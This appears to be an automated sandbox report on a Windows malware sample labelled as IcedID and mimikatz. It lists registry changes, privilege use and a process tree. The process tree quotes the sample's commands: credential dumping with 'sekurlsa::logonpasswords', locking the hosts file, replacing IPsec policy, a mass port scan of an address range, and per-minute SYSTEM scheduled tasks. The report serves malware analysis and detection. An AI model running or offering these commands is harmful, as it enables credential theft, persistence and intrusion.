Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jobnkm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ysesbhsym.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lebulsi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bdltnuisb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 3248 cmd.exe 3704 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x0008000000023c7a-6.dat nsis_installer_2 behavioral2/files/0x0008000000023c9b-15.dat nsis_installer_1 behavioral2/files/0x0008000000023c9b-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
Processes:
sadefbibf.exesadefbibf.exesadefbibf.exelebulsi.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" lebulsi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" lebulsi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ lebulsi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" lebulsi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" lebulsi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing lebulsi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals sadefbibf.exe -
Modifies registry class 14 IoCs
Processes:
lebulsi.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" lebulsi.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 3200 schtasks.exe 1544 schtasks.exe 3368 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
lebulsi.exepid Process 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 656 656 656 656 656 656 656 656 656 656 656 656 656 656 656 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exepid Process 3656 2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exelebulsi.exelebulsi.exevfshost.exesadefbibf.exeuuetgf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exedescription pid Process Token: SeDebugPrivilege 3656 2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4828 lebulsi.exe Token: SeDebugPrivilege 1920 lebulsi.exe Token: SeDebugPrivilege 3928 vfshost.exe Token: SeDebugPrivilege 880 sadefbibf.exe Token: SeLockMemoryPrivilege 3600 uuetgf.exe Token: SeLockMemoryPrivilege 3600 uuetgf.exe Token: SeDebugPrivilege 1532 sadefbibf.exe Token: SeDebugPrivilege 4124 sadefbibf.exe Token: SeDebugPrivilege 4568 sadefbibf.exe Token: SeDebugPrivilege 1768 sadefbibf.exe Token: SeDebugPrivilege 1608 sadefbibf.exe Token: SeDebugPrivilege 4024 sadefbibf.exe Token: SeDebugPrivilege 4004 sadefbibf.exe Token: SeDebugPrivilege 1872 sadefbibf.exe Token: SeDebugPrivilege 4304 sadefbibf.exe Token: SeDebugPrivilege 4108 sadefbibf.exe Token: SeDebugPrivilege 3180 sadefbibf.exe Token: SeDebugPrivilege 1044 sadefbibf.exe Token: SeDebugPrivilege 3752 sadefbibf.exe Token: SeDebugPrivilege 4524 sadefbibf.exe Token: SeDebugPrivilege 2800 sadefbibf.exe Token: SeDebugPrivilege 1532 sadefbibf.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exelebulsi.exelebulsi.exexohudmc.exejobnkm.exelebulsi.exepid Process 3656 2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe 3656 2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe 4828 lebulsi.exe 4828 lebulsi.exe 1920 lebulsi.exe 1920 lebulsi.exe 3484 xohudmc.exe 2052 jobnkm.exe 996 lebulsi.exe 996 lebulsi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.execmd.exelebulsi.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 3656 wrote to memory of 3248 3656 2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe 82 PID 3656 wrote to memory of 3248 3656 2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe 82 PID 3656 wrote to memory of 3248 3656 2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe 82 PID 3248 wrote to memory of 3704 3248 cmd.exe 84 PID 3248 wrote to memory of 3704 3248 cmd.exe 84 PID 3248 wrote to memory of 3704 3248 cmd.exe 84 PID 3248 wrote to memory of 4828 3248 cmd.exe 89 PID 3248 wrote to memory of 4828 3248 cmd.exe 89 PID 3248 wrote to memory of 4828 3248 cmd.exe 89 PID 1920 wrote to memory of 1348 1920 lebulsi.exe 91 PID 1920 wrote to memory of 1348 1920 lebulsi.exe 91 PID 1920 wrote to memory of 1348 1920 lebulsi.exe 91 PID 1348 wrote to memory of 4548 1348 cmd.exe 93 PID 1348 wrote to memory of 4548 1348 cmd.exe 93 PID 1348 wrote to memory of 4548 1348 cmd.exe 93 PID 1348 wrote to memory of 5012 1348 cmd.exe 94 PID 1348 wrote to memory of 5012 1348 cmd.exe 94 PID 1348 wrote to memory of 5012 1348 cmd.exe 94 PID 1348 wrote to memory of 2424 1348 cmd.exe 95 PID 1348 wrote to memory of 2424 1348 cmd.exe 95 PID 1348 wrote to memory of 2424 1348 cmd.exe 95 PID 1348 wrote to memory of 4616 1348 cmd.exe 96 PID 1348 wrote to memory of 4616 1348 cmd.exe 96 PID 1348 wrote to memory of 4616 1348 cmd.exe 96 PID 1348 wrote to memory of 396 1348 cmd.exe 97 PID 1348 wrote to memory of 396 1348 cmd.exe 97 PID 1348 wrote to memory of 396 1348 cmd.exe 97 PID 1348 wrote to memory of 4636 1348 cmd.exe 98 PID 1348 wrote to memory of 4636 1348 cmd.exe 98 PID 1348 wrote to memory of 4636 1348 cmd.exe 98 PID 1920 wrote to memory of 3388 1920 lebulsi.exe 102 PID 1920 wrote to memory of 3388 1920 lebulsi.exe 102 PID 1920 wrote to memory of 3388 1920 lebulsi.exe 102 PID 1920 wrote to memory of 4524 1920 lebulsi.exe 104 PID 1920 wrote to memory of 4524 1920 lebulsi.exe 104 PID 1920 wrote to memory of 4524 1920 lebulsi.exe 104 PID 1920 wrote to memory of 3200 1920 lebulsi.exe 106 PID 1920 wrote to memory of 3200 1920 lebulsi.exe 106 PID 1920 wrote to memory of 3200 1920 lebulsi.exe 106 PID 1920 wrote to memory of 736 1920 lebulsi.exe 110 PID 1920 wrote to memory of 736 1920 lebulsi.exe 110 PID 1920 wrote to memory of 736 1920 lebulsi.exe 110 PID 736 wrote to memory of 4920 736 cmd.exe 112 PID 736 wrote to memory of 4920 736 cmd.exe 112 PID 736 wrote to memory of 4920 736 cmd.exe 112 PID 4920 wrote to memory of 864 4920 wpcap.exe 113 PID 4920 wrote to memory of 864 4920 wpcap.exe 113 PID 4920 wrote to memory of 864 4920 wpcap.exe 113 PID 864 wrote to memory of 4964 864 net.exe 115 PID 864 wrote to memory of 4964 864 net.exe 115 PID 864 wrote to memory of 4964 864 net.exe 115 PID 4920 wrote to memory of 4576 4920 wpcap.exe 116 PID 4920 wrote to memory of 4576 4920 wpcap.exe 116 PID 4920 wrote to memory of 4576 4920 wpcap.exe 116 PID 4576 wrote to memory of 4316 4576 net.exe 118 PID 4576 wrote to memory of 4316 4576 net.exe 118 PID 4576 wrote to memory of 4316 4576 net.exe 118 PID 4920 wrote to memory of 5096 4920 wpcap.exe 119 PID 4920 wrote to memory of 5096 4920 wpcap.exe 119 PID 4920 wrote to memory of 5096 4920 wpcap.exe 119 PID 5096 wrote to memory of 3424 5096 net.exe 121 PID 5096 wrote to memory of 3424 5096 net.exe 121 PID 5096 wrote to memory of 3424 5096 net.exe 121 PID 4920 wrote to memory of 4592 4920 wpcap.exe 122
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1004
-
C:\Windows\TEMP\eyuduassi\uuetgf.exe"C:\Windows\TEMP\eyuduassi\uuetgf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-26_6f9e36e57297c31b816334750f50f887_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\seumlgyb\lebulsi.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3704
-
-
C:\Windows\seumlgyb\lebulsi.exeC:\Windows\seumlgyb\lebulsi.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4828
-
-
-
C:\Windows\seumlgyb\lebulsi.exeC:\Windows\seumlgyb\lebulsi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4548
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:5012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2424
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:396
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4636
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3388
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4524
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3200
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\zthyliniv\eftbbbiir\wpcap.exeC:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4964
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4316
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:3424
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4592 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:3804
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:336 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4396
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2480 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2980 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1072
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4520 -
C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exeC:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zthyliniv\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3608 -
C:\Windows\zthyliniv\Corporate\vfshost.exeC:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1116 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
